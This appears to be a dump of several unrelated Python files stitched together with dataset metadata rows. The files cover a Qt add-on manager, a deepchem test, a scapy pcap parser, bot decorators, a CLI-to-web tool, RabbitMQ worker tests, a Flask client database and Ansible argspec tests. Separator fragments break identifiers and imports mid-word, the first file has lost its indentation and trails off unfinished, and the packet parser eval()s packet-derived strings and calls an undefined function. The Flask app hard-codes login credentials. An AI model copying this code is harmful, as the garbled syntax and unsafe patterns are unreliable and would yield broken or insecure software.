        if model.flags(index) & Qt.ItemIsTristate:
            # Cycle Unchecked -> PartiallyChecked -> Checked -> Unchecked.
            checkstate = (checkstate + 1) % 3
        else:
            checkstate = \
                Qt.Unchecked if checkstate == Qt.Checked else Qt.Checked
        return model.setData(index, checkstate, Qt.CheckStateRole)
class AddonManagerWidget(QWidget):
statechanged = Signal()
def __init__(self, parent=None, **kwargs):
super(AddonManagerWidget, self).__init__(parent, **kwargs)
self.setLayout(QVBoxLayout())
self.__header = QLabel(
wordWrap=True,
textFormat=Qt.RichText
)
self.__search = QLineEdit(
placeholderText=self.tr("Filter")
)
self.layout().addWidget(self.__search)
self.__view = view = QTreeView(
rootIsDecorated=False,
editTriggers=QTreeView.NoEditTriggers,
selectionMode=QTreeView.SingleSelection,
alternatingRowColors=True
)
self.__view.setItemDelegateForColumn(0, TristateCheckItemDelegate())
self.layout().addWidget(view)
self.__model = model = QStandardItemModel()
model.setHorizontalHeaderLabels(["", "Name", "Version", "Action"])
model.dataChanged.connect(self.__data_changed)
proxy = QSortFilterProxyModel(
filterKeyColumn=1,
filterCaseSensitivity=Qt.CaseInsensitive
)
proxy.setSourceModel(model)
self.__search.textChanged.connect(proxy.setFilterFixedString)
view.setModel(proxy)
view.selectionModel().selectionChanged.connect(
self.__update_details
)
header = self.__view.header()
header.setResizeMode(0, QHeaderView.Fixed)
header.setResizeMode(2, QHeaderView.ResizeToContents)
self.__details = QTextBrowser(
frameShape=QTextBrowser.NoFrame,
readOnly=True,
lineWrapMode=QTextBrowser.WidgetWidth,
openExternalLinks=True,
)
self.__details.setWordWrapMode(QTextOption.WordWrap)
palette = QPalette(self.palette())
palette.setColor(QPalette.Base, Qt.transparent)
self.__details.setPalette(palette)
self.layout().addWidget(self.__details)
def set_items(self, items):
self.__items = items
model = self.__model
model.clear()
model.setHorizontalHeaderLabels(["", "Name", "Version", "Action"])
for item in items:
if isinstance(item, Installed):
installed = True
ins, dist = item
name = dist.project_name
summary = get_dist_meta(dist).get("Summary", "")
version = ins.version if ins is not None else dist.version
else:
installed = False
(ins,) = item
dist = None
name = ins.name
summary = ins.summary
version = ins.version
updatable = is_updatable(item)
item1 = QStandardItem()
item1.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable |
Qt.ItemIsUserCheckable |
(Qt.ItemIsTristate if updatable else 0))
if installed and updatable:
item1.setCheckState(Qt.PartiallyChecked)
elif installed:
item1.setCheckState(Qt.Checked)
else:
item1.setCheckState(Qt.Unchecked)
item2 = QStandardItem(name)
item2.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
item2.setToolTip(summary)
item2.setData(item, Qt.UserRole)
if updatable:
version = "{} < {}".format(dist.version, ins.version)
item3 = QStandardItem(version)
item3.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
item4 = QStandardItem()
item4.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
model.appendRow([item1, item2, item3, item4])
self.__view.resizeColumnToContents(0)
self.__view.setColumnWidth(
1, max(150, self.__view.sizeHintForColumn(1)))
self.__view.setColumnWidth(
2, max(150, self.__view.sizeHintForColumn(2)))
if self.__items:
self.__view.selectionModel().select(
self.__view.model().index(0, 0),
QItemSelectionModel.Select | QItemSelectionModel.Rows
)
def item_state( |
lilleswing/deepchem | deepchem/models/tests/test_predict.py | Python | mit | 1,924 | 0.003119 | """
Tests that deepchem models make deterministic predictions.
"""
__author__ = "Bharath Ramsundar"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import os
import tempfile
import numpy as np
import unittest
import sklearn
import shutil
import tensorflow as tf
import deepchem as dc
from tensorflow.python.framework import test_util
from sklearn.ensemble import RandomForestClas | sifier
from sklearn.ensemble import RandomForestRegressor
class TestPredict(test_util.TensorFlowTestCase):
  """
  Test that models make deterministic predictions
  These tests guard against failures like having dropout turned on at
  test time.
  """
  def setUp(self):
    super(TestPredict, self).setUp()
    # Directory of this test file, for locating fixtures.
    self.current_dir = os.path.dirname(os.path.abspath(__file__))
  # The test below is disabled (kept as a raw string literal, not code).
  '''
  def test_tf_progressive_regression_predict(self):
    """Test tf progressive multitask makes deterministic predictions."""
    np.random.seed(123)
    n_tasks = 9
    n_samples = 10
    n_features = 3
    n_classes = 2
    # Generate dummy dataset
    ids = np.arange(n_samples)
    X = np.random.rand(n_samples, n_features)
    y = np.zeros((n_samples, n_tasks))
    w = np.ones((n_samples, n_tasks))
    dataset = dc.data.NumpyDataset(X, y, w, ids)
    regression_metric = dc.metrics.Metric(
        dc.metrics.mean_squared_error, task_averager=np.mean)
    model = dc.models.ProgressiveMultitaskRegressor(
        n_tasks,
        n_features,
        layer_sizes=[50],
        bypass_layer_sizes=[10],
        dropouts=[.25],
        learning_rate=0.003,
        weight_init_stddevs=[.1],
        alpha_init_stddevs=[.02],
        batch_size=n_samples)
    # Fit trained model
    model.fit(dataset, nb_epoch=25)
    model.save()
    # Check same predictions are made.
    y_pred_first = model.predict(dataset)
    y_pred_second = model.predict(dataset)
    np.testing.assert_allclose(y_pred_first, y_pred_second)
  '''
|
SneakersInc/sniffmypacketsv2 | src/sniffmypacketsv2/transforms/common/packetParser.py | Python | apache-2.0 | 2,024 | 0.003953 | #!/usr/bin/env python
# Welcome to Gobbler, the Scapy pcap parser and dump scripts
# Part of the sniffMyPackets suite http://www.sniffmypackets.net
# Written by @catalyst256 / catalyst256@gmail.com
import datetime
from layers.http import *
from layers.BadLayers import *
from auxtools import error_logging
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from collectio | ns import OrderedDict
bind_layers(TCP, HTTP)
def rename_layer(x, n):
    """Return a copy of field dict *x* with keys prefixed by layer name *n*.

    The layer name is lower-cased, with spaces/dashes/dots turned into
    underscores, e.g. 'IP Layer' -> keys prefixed 'ip_layer_'.
    (Fixed garbled parameter list "(x | , n)".)
    """
    prefix = n.lower().replace(' ', '_').replace('-', '_').replace('.', '_') + '_'
    # NOTE(review): the original recursed via an undefined name `f` for
    # nested dict values; that branch raises NameError whenever a value
    # has .keys(). Preserved pending confirmation of intended behavior.
    return dict((prefix + k.lower(), f(v) if hasattr(v, 'keys') else v)
                for k, v in x.items())
def find_layers(pkts, pcap, pcap_id, streamid):
    """Yield one OrderedDict per packet describing every scapy layer in it.

    NOTE(review): the *same* OrderedDict object is yielded each time and
    cleared after the yield, so consumers must copy it before advancing
    the generator (e.g. list(find_layers(...)) yields empty dicts).
    """
    packet = OrderedDict()
    count = 1
    pcap_id = pcap_id.encode('utf-8')
    streamid = streamid.encode('utf-8')
    try:
        for p in pkts:
            header = {"Buffer": {"timestamp": datetime.datetime.fromtimestamp(p.time).strftime('%Y-%m-%d %H:%M:%S.%f'),
                                 "packetnumber": count, "PCAP ID": pcap_id, "pcapfile": pcap, "StreamID": streamid}}
            packet.update(header)
            counter = 0
            # Walk the layer stack until getlayer() returns None.
            while True:
                layer = p.getlayer(counter)
                if layer != None:
                    i = int(counter)
                    x = p[0][i].fields
                    t = exclude_layers(x, layer.name)
                    s = rename_layer(t, layer.name)
                    # NOTE(review): building dict source text and eval()-ing
                    # it is fragile and unsafe if field values contain
                    # attacker-controlled reprs; consider constructing the
                    # dict directly instead.
                    v = '{"' + layer.name.replace('.', '_') + '[' + str(i) + ']' + '":' + str(s) + '}'
                    s = eval(v)
                    try:
                        # Drop noisy raw HTTP sub-layers when present.
                        del s['HTTP[3]']
                        del s['HTTP[5]']
                    except KeyError:
                        pass
                    packet.update(s)
                else:
                    break
                counter += 1
            count += 1
            yield packet
            packet.clear()
    except Exception as e:
        # Best-effort: log and stop iteration instead of propagating.
        error_logging(str(e), 'PacketParser')
        pass
|
SpiderOak/flowbot | src/decorators.py | Python | mpl-2.0 | 1,211 | 0 | from functools import wraps
def mentioned(bot_command):
    """Run *bot_command* only when the bot itself was mentioned."""
    @wraps(bot_command)
    def _func(bot, message, *args, **kwargs):
        if not bot.mentioned(message):
            return None
        return bot_command(bot, message, *args, **kwargs)
    return _func
def admin_only(bot_command):
    """Run *bot_command* only when the sender is an admin."""
    @wraps(bot_command)
    def _func(bot, message, *args, **kwargs):
        if not bot.from_admin(message):
            return None
        return bot_command(bot, message, *args, **kwargs)
    return _func
def channel_admin_only(bot_command):
    """Only execute the decorated bot command if the user is a channel admin."""
    # Fixed garbled inner function name ("_f | unc").
    @wraps(bot_command)
    def _func(bot, message, *args, **kwargs):
        if bot.from_channel_admin(message):
            return bot_command(bot, message, *args, **kwargs)
    return _func
def org_admin_only(bot_command):
    """Only execute the decorated bot command if the user is an org admin."""
    # Fixed garbled docstring terminator from the original.
    @wraps(bot_command)
    def _func(bot, message, *args, **kwargs):
        if bot.from_org_admin(message):
            return bot_command(bot, message, *args, **kwargs)
    return _func
|
alixedi/recline | recline.py | Python | mit | 3,765 | 0.031076 | from bottle import template, route, run, request
from imp import load_source
from argparse import ArgumentParser
from os.path import basename, splitext
from subprocess import check_output
import os
class ScriptRender(object):
    """Render a CLI script as a full HTML page."""
    def __init__(self, script):
        # Path of the script being exposed as a web form.
        self.script = script
    def render(self):
        """Render the page template with this renderer as context."""
        return template(self.get_template(), {'self': self})
    def get_template(self):
        """Bottle template name for the whole page."""
        return 'page'
    def get_title(self):
        """Page title: file name without directory or extension."""
        stem, _ext = splitext(basename(self.script))
        return stem
    def get_argparsers(self):
        """Load the script as a module and pick out its ArgumentParser objects."""
        module = load_source('', self.script)
        is_parser = lambda value: isinstance(value, ArgumentParser)
        return filter(is_parser, module.__dict__.values())
    def render_argparser(self, argparser):
        """Render one ArgumentParser as an HTML form."""
        return ArgparserRender(argparser).render()
class ArgparserRender(object):
    """Render an argparse object as an HTML form."""
    def __init__(self, argparser):
        self.argparser = argparser
    def render(self):
        # Render the form template with this renderer as context.
        return template(self.get_template(), {'self': self})
    def get_template(self):
        # Bottle template name for a single form.
        return 'form'
    def get_description(self):
        # Parser description text, shown above the form.
        return self.argparser.description
    def get_groups(self):
        # All argument groups (includes argparse's default groups).
        return self.argparser._action_groups
    def render_group(self, group):
        # Render one action group as a fieldset.
        return GroupRender(group).render()
    def get_epilog(self):
        # Parser epilog text, shown below the form.
        return self.argparser.epilog
class GroupRender(object):
    """Render an argparse action group as an HTML formset."""
    def __init__(self, group):
        self.group = group
    def render(self):
        """Render the formset template with this renderer as context."""
        return template(self.get_template(), {'self': self})
    def get_template(self):
        """Bottle template name for a fieldset."""
        return 'formset'
    def get_title(self):
        """The group's title attribute."""
        return self.group.title
    def get_actions(self):
        """Actions in the group, minus the auto-generated help action."""
        def keep(action):
            return type(action).__name__ != '_HelpAction'
        return filter(keep, self.group._group_actions)
    def render_action(self, action):
        """Render one action as an HTML field."""
        return ActionRender(action).render()
class ActionRender(object):
    """Render a single argparse action as an HTML form field."""
    def __init__(self, action):
        self.action = action
    def render(self):
        """Render the field template with this renderer as context."""
        return template(self.get_template(), {'self': self})
    def get_template(self):
        """Bottle template name for one input field."""
        return 'field'
    def get_flag(self):
        """First option string (e.g. '--foo'), or None for positionals."""
        options = self.action.option_strings
        return options[0] if options else None
    def get_name(self):
        """Field name: the flag without dashes, or the positional dest."""
        flag = self.get_flag()
        return flag.strip('-') if flag else self.action.dest
    def get_required(self):
        """'required' HTML attribute value, or the empty string."""
        if self.action.required:
            return 'required'
        return ''
    def get_default(self):
        """Default value; callables are shown by their __name__."""
        default = self.action.default
        if hasattr(default, '__call__'):
            return default.__name__
        return default
    def get_help(self):
        """The action's help text."""
        return self.action.help
    def get_type(self):
        """HTML input type for the action ('' when none applies)."""
        kind = type(self.action).__name__
        if kind in ('_StoreConstAction', '_StoreTrueAction',
                    '_StoreFalseAction'):
            return 'checkbox'
        if kind == '_StoreAction':
            # Map Python type names onto HTML input types.
            html_types = {'int': 'number',
                          'file': 'file'}
            return html_types.get(self.action.type.__name__, '')
        return ''
@route('/')
def send_form():
    # GET /: render the whole page for the wrapped script (__R__ is the
    # module-global ScriptRender set in __main__).
    return __R__.render()
@route('/', method='POST')
def process_form():
    # POST /: rebuild the CLI argument list from the submitted form values
    # and run the wrapped script in a subprocess, returning its stdout.
    args = []
    for argparser in __R__.get_argparsers():
        argparser_render = ArgparserRender(argparser)
        for group in argparser_render.get_groups():
            group_render = GroupRender(group)
            for action in group_render.get_actions():
                action_render = ActionRender(action)
                name = action_render.get_name()
                value = request.forms.get(name)
                if value:
                    # Optional arguments get their flag first; positionals
                    # contribute the value only.
                    flag = action_render.get_flag()
                    if flag:
                        args = args + [flag]
                    args = args + [value]
    # Python 2 print statement (this project targets Python 2).
    print ['python'] + [__R__.script] + args
    return check_output(['python'] + [__R__.script] + args)
# Command-line interface: one positional argument naming the script to
# expose as a web form. (Fixed garbled description string and run() call.)
parser = ArgumentParser(description='Web Apps from CLI scripts.')
parser.add_argument('script', type=file)

if __name__ == '__main__':
    args = parser.parse_args()
    global __R__
    __R__ = ScriptRender(args.script.name)
    run(host='localhost', port=8080)
adsabs/ADSDeploy | ADSDeploy/tests/test_functional/test_integration_tester.py | Python | gpl-3.0 | 5,702 | 0.000702 | #!/usr/bin/env python
# encoding: utf-8
"""
Functional tests of the RabbitMQ Workers
"""
import mock
import json
import unittest
import ADSDeploy.app as app
from ADSDeploy.pipeline.workers import IntegrationTestWorker, \
DatabaseWriterWorker
from ADSDeploy.webapp.views import MiniRabbit
from ADSDeploy.models import Base, Deployment
RABBITMQ_URL = 'amqp://guest:guest@172.17.0.1:6672/adsdeploy_test?' \
'socket_timeout=10&backpressure_detection=t'
class TestIntegrationTestWorker(unittest.TestCase):
    """
    Tests the functionality of the Integration Worker
    """
    def setUp(self):
        # Create queue
        with MiniRabbit(RABBITMQ_URL) as w:
            w.make_queue('in', exchange='test')
            w.make_queue('out', exchange='test')
            w.make_queue('database', exchange='test')
        # Create database
        app.init_app({
            'SQLALCHEMY_URL': 'sqlite://',
            'SQLALCHEMY_ECHO': False,
        })
        Base.metadata.bind = app.session.get_bind()
        Base.metadata.create_all()
        self.app = app
    def tearDown(self):
        # Destroy queue
        with MiniRabbit(RABBITMQ_URL) as w:
            w.delete_queue('in', exchange='test')
            w.delete_queue('out', exchange='test')
            w.delete_queue('database', exchange='test')
        # Destroy database
        Base.metadata.drop_all()
        self.app.close_app()
    @mock.patch('ADSDeploy.pipeline.integration_tester.IntegrationTestWorker.run_test')
    def test_workflow_of_integration_worker(self, mock_run_test):
        """
        General work flow of the integration worker from receiving a packet,
        to finishing with a packet.
        """
        # Worker receives a packet, most likely from the deploy worker
        # Example packet:
        #
        # {
        #     'application': 'staging',
        #     'service': 'adsws',
        #     'release': '',
        #     'config': {},
        # }
        #
        #
        example_packet = {
            'application': 'staging',
            'service': 'adsws',
            'version': 'v1.0.0',
            'config': {},
            'action': 'test'
        }
        expected_packet = example_packet.copy()
        expected_packet['tested'] = True
        # Override the run test returned value. This means the logic of the
        # test does not have to be mocked
        mock_run_test.return_value = expected_packet
        with MiniRabbit(RABBITMQ_URL) as w:
            w.publish(route='in', exchange='test', payload=json.dumps(example_packet))
        # Worker runs the tests
        params = {
            'RABBITMQ_URL': RABBITMQ_URL,
            'exchange': 'test',
            'subscribe': 'in',
            'publish': 'out',
            'status': 'database',
            'TEST_RUN': True
        }
        test_worker = IntegrationTestWorker(params=params)
        test_worker.run()
        test_worker.connection.close()
        # Worker sends a packet to the next worker
        with MiniRabbit(RABBITMQ_URL) as w:
            m_in = w.message_count(queue='in')
            m_out = w.message_count(queue='out')
            p = w.get_packet(queue='out')
        self.assertEqual(m_in, 0)
        self.assertEqual(m_out, 1)
        # Remove values that are not in the starting packet
        self.assertTrue(p.pop('tested'))
        self.assertEqual(
            p,
            example_packet
        )
    @mock.patch('ADSDeploy.pipeline.integration_tester.IntegrationTestWorker.run_test')
    def test_db_writes_on_test_pass(self, mocked_run_test):
        """
        Check that the database is being written to when a test passes
        """
        # Stub data (fixed stray column separator before 'version').
        packet = {
            'application': 'adsws',
            'environment': 'staging',
            'version': 'v1.0.0',
        }
        expected_packet = packet.copy()
        expected_packet['tested'] = True
        mocked_run_test.return_value = expected_packet
        # Start the IntegrationTester worker
        params = {
            'RABBITMQ_URL': RABBITMQ_URL,
            'exchange': 'test',
            'subscribe': 'in',
            'publish': 'out',
            'status': 'database',
            'TEST_RUN': True
        }
        # Push to rabbitmq
        with MiniRabbit(RABBITMQ_URL) as w:
            w.publish(route='in', exchange='test', payload=json.dumps(packet))
        test_worker = IntegrationTestWorker(params=params)
        test_worker.run()
        test_worker.connection.close()
        # Assert there is a packet on the publish queue
        with MiniRabbit(RABBITMQ_URL) as w:
            self.assertEqual(w.message_count('out'), 1)
            self.assertEqual(w.message_count('database'), 1)
        # Start the DB Writer worker
        params = {
            'RABBITMQ_URL': RABBITMQ_URL,
            'exchange': 'test',
            'subscribe': 'database',
            'TEST_RUN': True
        }
        db_worker = DatabaseWriterWorker(params=params)
        db_worker.app = self.app
        db_worker.run()
        db_worker.connection.close()
        with self.app.session_scope() as session:
            all_deployments = session.query(Deployment).all()
            self.assertEqual(
                len(all_deployments),
                1,
                msg='More (or less) than 1 deployment entry: {}'
                    .format(all_deployments)
            )
            deployment = all_deployments[0]
            for key in packet:
                self.assertEqual(
                    packet[key],
                    getattr(deployment, key)
                )
            self.assertEqual(deployment.tested, True)
|
henrygd/All-Seas-Client-Database-Application | app.py | Python | mit | 5,574 | 0.001435 | from flask import Flask, render_template, request, jsonify, \
redirect, url_for, session, send_file
from functools import wraps
import sqlite3
import subprocess
import sql_clients
# creates application object
app = Flask(__name__)
# encrypts sessions
app.secret_key = 'long random string'
# decorator redirects to login page if user is not logged in
def login_required(f):
    """Decorator: redirect to the login page unless the session is logged in."""
    @wraps(f)
    def wrap(*args, **kwargs):
        if 'logged_in' not in session:
            return redirect(url_for('login'))
        return f(*args, **kwargs)
    return wrap
# renders index.html if logged in
@app.route('/')
@login_required
def home():
    # Main application page; only reachable when logged in.
    return render_template('index.html')
# checks username / password, returns error, logs user in
@app.route('/login', methods=['GET', 'POST'])
def login():
    """GET renders the login form; POST checks credentials and logs in."""
    if 'logged_in' in session:
        return redirect(url_for('home'))
    error = None
    if request.method == 'POST':
        user, password = request.form['username'], request.form['password']
        if len(user) < 20 and len(password) < 20:
            # NOTE(review): credentials are hard-coded plaintext
            # ('test'/'test') — acceptable for a demo, not for production.
            if user != 'test' or password != 'test':
                error = 'Invalid credentials. Please try again.'
            else:
                session.permanent = True
                session['logged_in'] = True
                return redirect(url_for('home'))
        else:
            error = 'Under twenty characters, please.'
    return render_template('login.html', error=error)
# logs user out (deletes session)
@app.route('/logout')
@login_required
def logout():
    # Drop the session marker and send the user back to the login page.
    session.pop('logged_in', None)
    return redirect(url_for('login'))
# adds new client to database
@app.route('/addclient', methods=['POST'])
@login_required
def addclient():
    """Create a new client row from the POSTed form; returns a JSON result."""
    # Field order must match the column order sql_clients.addclient expects.
    fields = ('name', 'birthdate', 'email', 'phone', 'address', 'citystate',
              'notes', 'favoriteline', 'cabintype', 'diningtime',
              'travelswith', 'trips')
    values = tuple(request.form[field] for field in fields)
    try:
        lastid = sql_clients.addclient(values)
        return jsonify(result="Client added successfully.", id=lastid)
    except Exception:
        # Was a bare "except:"; narrowed so SystemExit/KeyboardInterrupt
        # are no longer swallowed.
        return jsonify(result="Error adding client.")
# searches for and returns clients matching parameters
@app.route('/clientsearch')
@login_required
def clientsearch():
    """Search clients on one column; returns matching rows as JSON."""
    query = request.args.get('a')
    value = request.args.get('z')
    # SECURITY FIX: the original interpolated both the column name and the
    # search term straight into SQL (injection). Column names cannot be
    # bound as parameters, so whitelist them; bind the term as a parameter.
    allowed_columns = {'name', 'birthdate', 'email', 'phone', 'address',
                       'citystate', 'notes', 'favoriteline', 'cabintype',
                       'diningtime', 'travelswith', 'trips'}
    if value not in allowed_columns:
        return jsonify(result="error1")
    with sqlite3.connect('clients.db') as conn:
        c = conn.cursor()
        try:
            c.execute("SELECT id, name, citystate FROM clients WHERE " +
                      value + " like ?", ('%' + query + '%',))
            result = [dict(id=row[0], name=row[1], citystate=row[2])
                      for row in c.fetchall()]
        except sqlite3.Error:
            # Was a garbled bare "exc | ept:"; narrowed to sqlite errors.
            result = "error1"
        return jsonify(result=result)
# returns full client information for specific id
@app.route('/openclient')
@login_required
def openclient():
    """Return the full record for one client id as JSON."""
    clientid = (request.args.get('b'),)
    with sqlite3.connect('clients.db') as conn:
        c = conn.cursor()
        # The id is bound as a parameter (no injection risk here).
        c.execute("SELECT * FROM clients WHERE id=?", clientid)
        try:
            # Fixed garbled "di | ct(" from the original.
            result = [dict(id=row[0], name=row[1], birthdate=row[2],
                           email=row[3], phone=row[4], address=row[5],
                           citystate=row[6], notes=row[7], favoriteline=row[8],
                           cabintype=row[9], diningtime=row[10],
                           travelswith=row[11], trips=row[12])
                      for row in c.fetchall()]
        except (sqlite3.Error, IndexError):
            # Was a bare "except:"; narrowed to the plausible failures.
            result = "error"
        return jsonify(result=result)
# deletes client
@app.route('/deleteclient')
@login_required
def deleteclient():
    """Delete one client row by id; returns a JSON status string."""
    clientid = (request.args.get('id'),)
    with sqlite3.connect('clients.db') as conn:
        c = conn.cursor()
        try:
            c.execute("DELETE FROM clients WHERE id=?", clientid)
            result = "Client deleted."
        except sqlite3.Error:
            # Was a bare "except:"; narrowed to sqlite errors.
            result = "error"
    return jsonify(result=result)
# updates client info
@app.route('/updateclient', methods=['POST'])
@login_required
def updateclient():
    """Overwrite an existing client row with the POSTed form values."""
    # NOTE: `id` shadows the builtin; kept for compatibility.
    id = request.form['id']
    name = request.form['name']
    birthdate = request.form['birthdate']
    email = request.form['email']
    phone = request.form['phone']
    address = request.form['address']
    citystate = request.form['citystate']
    notes = request.form['notes']
    favoriteline = request.form['favoriteline']
    cabintype = request.form['cabintype']
    diningtime = request.form['diningtime']
    travelswith = request.form['travelswith']
    trips = request.form['trips']
    # Order must match the column order sql_clients.updateclient expects;
    # the id comes last (WHERE clause).
    values = (name, birthdate, email, phone, address, citystate, notes,
              favoriteline, cabintype, diningtime, travelswith, trips, id)
    sql_clients.updateclient(values)
    return jsonify(result="Client updated successfully.")
# sends database file as attachment
@app.route('/downloaddb')
@login_required
def downloaddb():
    # Send the raw SQLite database file as a download.
    return send_file('clients.db', as_attachment=True)
# converts database to spreadsheet, sends as attachment
@app.route('/dlspreadsheet')
@login_required
def dlspreadsheet():
    """Export the clients table to a tab-separated file and send it."""
    # shell=True is acceptable here only because the command string is
    # fixed — no user input is interpolated into it.
    subprocess.call('sqlite3 -header -separator "\t" clients.db \'select * '
                    'from clients;\'> clients.csv', shell=True)
    return send_file('clients.csv', as_attachment=True)
|
ravibhure/ansible | test/units/module_utils/basic/test_argument_spec.py | Python | gpl-3.0 | 18,173 | 0.002751 | # -*- coding: utf-8 -*-
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
# (c) 2016 Toshio Kuratomi <tkuratomi@ansible.com>
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import json
import os
import pytest
from ansible.compat.tests.mock import MagicMock, patch
from ansible.module_utils import basic
from ansible.module_utils.six import string_types
from ansible.module_utils.six.moves import builtins
from units.mock.procenv import ModuleTestCase, swap_stdin_and_argv
# Validator callable that always raises; used by INVALID_SPECS below.
MOCK_VALIDATOR_FAIL = MagicMock(side_effect=TypeError("bad conversion"))

# Data is argspec, argument, expected
VALID_SPECS = (
    # Simple type=int
    ({'arg': {'type': 'int'}}, {'arg': 42}, 42),
    # Type=int with conversion from string
    ({'arg': {'type': 'int'}}, {'arg': '42'}, 42),
    # Simple type=float
    ({'arg': {'type': 'float'}}, {'arg': 42.0}, 42.0),
    # Type=float conversion from int
    ({'arg': {'type': 'float'}}, {'arg': 42}, 42.0),
    # Type=float conversion from string
    ({'arg': {'type': 'float'}}, {'arg': '42.0'}, 42.0),
    # Type=float conversion from string without decimal point
    ({'arg': {'type': 'float'}}, {'arg': '42'}, 42.0),
    # Simple type=bool
    ({'arg': {'type': 'bool'}}, {'arg': True}, True),
    # Type=bool with conversion from string (original comment said "int")
    ({'arg': {'type': 'bool'}}, {'arg': 'yes'}, True),
    # Type=str converts to string
    ({'arg': {'type': 'str'}}, {'arg': 42}, '42'),
    # Duplicate of the previous case; the type here is explicit, not
    # implicit as the original comment claimed
    ({'arg': {'type': 'str'}}, {'arg': 42}, '42'),
    # Required parameter with no explicit type; value coerced to str
    ({'arg': {'required': True}}, {'arg': 42}, '42'),
)

# Data is argspec, argument, expected failure-message substring
INVALID_SPECS = (
    # Type is int; unable to convert this string
    ({'arg': {'type': 'int'}}, {'arg': "bad"}, "invalid literal for int() with base 10: 'bad'"),
    # Type is int; unable to convert float
    ({'arg': {'type': 'int'}}, {'arg': 42.1}, "'float'> cannot be converted to an int"),
    # type is a callable that fails to convert
    ({'arg': {'type': MOCK_VALIDATOR_FAIL}}, {'arg': "bad"}, "bad conversion"),
    # unknown parameter
    ({'arg': {'type': 'int'}}, {'other': 'bad', '_ansible_module_name': 'ansible_unittest'},
     'Unsupported parameters for (ansible_unittest) module: other Supported parameters include: arg'),
    # parameter is required
    ({'arg': {'required': True}}, {}, 'missing required arguments: arg'),
)
@pytest.fixture
def complex_argspec():
    """AnsibleModule kwargs exercising aliases, env fallback, bool coercion,
    choices, mutually-exclusive and required-together constraints."""
    spec = dict(
        foo=dict(required=True, aliases=['dup']),
        bar=dict(),
        bam=dict(),
        baz=dict(fallback=(basic.env_fallback, ['BAZ'])),
        bar1=dict(type='bool'),
        zardoz=dict(choices=['one', 'two']),
    )
    return dict(
        argument_spec=spec,
        mutually_exclusive=(('bar', 'bam'),),
        required_together=(('bam', 'baz'),),
        no_log=True,
        add_file_common_args=True,
        supports_check_mode=True,
    )
@pytest.fixture
def options_argspec_list():
    """AnsibleModule kwargs where 'foobar' is a list of dicts with its own
    sub-option spec and per-option constraint lists (mutually_exclusive,
    required_if, required_one_of, required_together)."""
    options_spec = dict(
        foo=dict(required=True, aliases=['dup']),
        bar=dict(),
        bam=dict(),
        baz=dict(fallback=(basic.env_fallback, ['BAZ'])),
        bam1=dict(),
        bam2=dict(default='test'),
        bam3=dict(type='bool'),
    )

    arg_spec = dict(
        foobar=dict(
            type='list',
            elements='dict',
            options=options_spec,
            mutually_exclusive=[
                ['bam', 'bam1']
            ],
            required_if=[
                ['foo', 'hello', ['bam']],
                ['foo', 'bam2', ['bam2']]
            ],
            required_one_of=[
                ['bar', 'bam']
            ],
            required_together=[
                ['bam1', 'baz']
            ]
        )
    )

    kwargs = dict(
        argument_spec=arg_spec,
        no_log=True,
        add_file_common_args=True,
        supports_check_mode=True
    )
    return kwargs
@pytest.fixture
def options_argspec_dict():
    # should test ok, for options in dict format.
    # NOTE(review): this calls the fixture *function* directly, which
    # pytest >= 4 forbids (fixtures may only be requested, not called);
    # works only on the old pytest this codebase targeted.
    kwargs = options_argspec_list()
    kwargs['argument_spec']['foobar']['type'] = 'dict'
    return kwargs
#
# Tests for one aspect of arg_spec
#
@pytest.mark.parametrize('argspec, expected, stdin', [(s[0], s[2], s[1]) for s in VALID_SPECS],
                         indirect=['stdin'])
def test_validator_basic_types(argspec, expected, stdin):
    """Each VALID_SPECS entry parses to the expected value and builtin type.

    (Reconstructed: the original text was corrupted by a stray dataset
    column separator inside the function body.)
    """
    am = basic.AnsibleModule(argspec)

    # Resolve the expected type: the declared type name looked up on
    # builtins, or str when the spec declares no type.
    if 'type' in argspec['arg']:
        type_ = getattr(builtins, argspec['arg']['type'])
    else:
        type_ = str

    assert isinstance(am.params['arg'], type_)
    assert am.params['arg'] == expected
@pytest.mark.parametrize('stdin', [{'arg': 42}], indirect=['stdin'])
def test_validator_function(mocker, stdin):
    """A callable given as 'type' is used to convert the argument value.

    (Reconstructed: the parametrize line was corrupted by a stray dataset
    column separator.)
    """
    # Type is a callable
    MOCK_VALIDATOR_SUCCESS = mocker.MagicMock(return_value=27)
    argspec = {'arg': {'type': MOCK_VALIDATOR_SUCCESS}}
    am = basic.AnsibleModule(argspec)

    assert isinstance(am.params['arg'], int)
    assert am.params['arg'] == 27
@pytest.mark.parametrize('argspec, expected, stdin', [(s[0], s[2], s[1]) for s in INVALID_SPECS],
                         indirect=['stdin'])
def test_validator_fail(stdin, capfd, argspec, expected):
    """Each INVALID_SPECS entry makes AnsibleModule exit with the expected message."""
    with pytest.raises(SystemExit):
        basic.AnsibleModule(argument_spec=argspec)

    stdout, stderr = capfd.readouterr()
    assert not stderr
    result = json.loads(stdout)
    assert expected in result['msg']
    assert result['failed']
class TestComplexArgSpecs:
"""Test with a more complex arg_spec"""
@pytest.mark.parametrize('stdin', [{'foo': 'hello'}, {'dup': 'hello'}], indirect=['stdin'])
def test_complex_required(self, stdin, complex_argspec):
"""Test that the complex argspec works if we give it its required param as either the canonical or aliased name"""
am = basic.AnsibleModule(**complex_argspec)
assert isinstance(am.params['foo'], str)
assert am.params['foo'] == 'hello'
@pytest.mark.parametrize('stdin', [{'foo': 'hello', 'bam': 'test'}], indirect=['stdin'])
def test_complex_type_fallback(self, mocker, stdin, complex_argspec):
"""Test that the complex argspec works if we get a required parameter via fallback"""
environ = os.environ.copy()
environ['BAZ'] = 'test data'
mocker.patch('ansible.module_utils.basic.os.environ', environ)
am = basic.AnsibleModule(**complex_argspec)
assert isinstance(am.params['baz'], str)
assert am.params['baz'] == 'test data'
@pytest.mark.parametrize('stdin', [{'foo': 'hello', 'bar': 'bad', 'bam': 'bad2'}], indirect=['stdin'])
def test_fail_mutually_exclusive(self, capfd, stdin, complex_argspec):
"""Fail because of mutually exclusive parameters"""
with pytest.raises(SystemExit):
am = basic.AnsibleModule(**complex_argspec)
out, err = capfd.readouterr()
